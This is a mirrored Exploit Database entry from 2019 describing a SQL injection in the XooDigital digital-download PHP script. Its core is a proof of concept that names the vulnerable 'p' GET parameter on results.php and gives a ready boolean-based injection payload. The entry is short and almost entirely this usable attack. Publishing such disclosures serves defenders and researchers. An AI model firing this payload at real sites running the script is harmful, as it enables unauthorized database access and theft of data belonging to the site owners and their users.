XooDigital – ‘p’ SQL Injection

• Exploit Database
• 13 阅读

• 作者： Ahmet Ümit BAYRAM
  日期： 2019-03-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46610/

• # Exploit Title: XooDigital - 'p' SQL Injection
  # Date: 26.03.2019
  # Exploit Author: Ahmet Ümit BAYRAM
  # Vendor Homepage: https://xooscripts.com/product/digital-download-protection-script.html
  # Demo Site: http://xooscripts.com/demos/xoodigital/
  # Version: Lastest
  # Tested on: Kali Linux
  # CVE: N/A
  
  ----- PoC : SQLi -----
  
  Request: http://localhost/[PATH]/results.php?p=1
  Vulnerable Parameter: p (GET)
  Payload: p=1') OR NOT 7970=7970#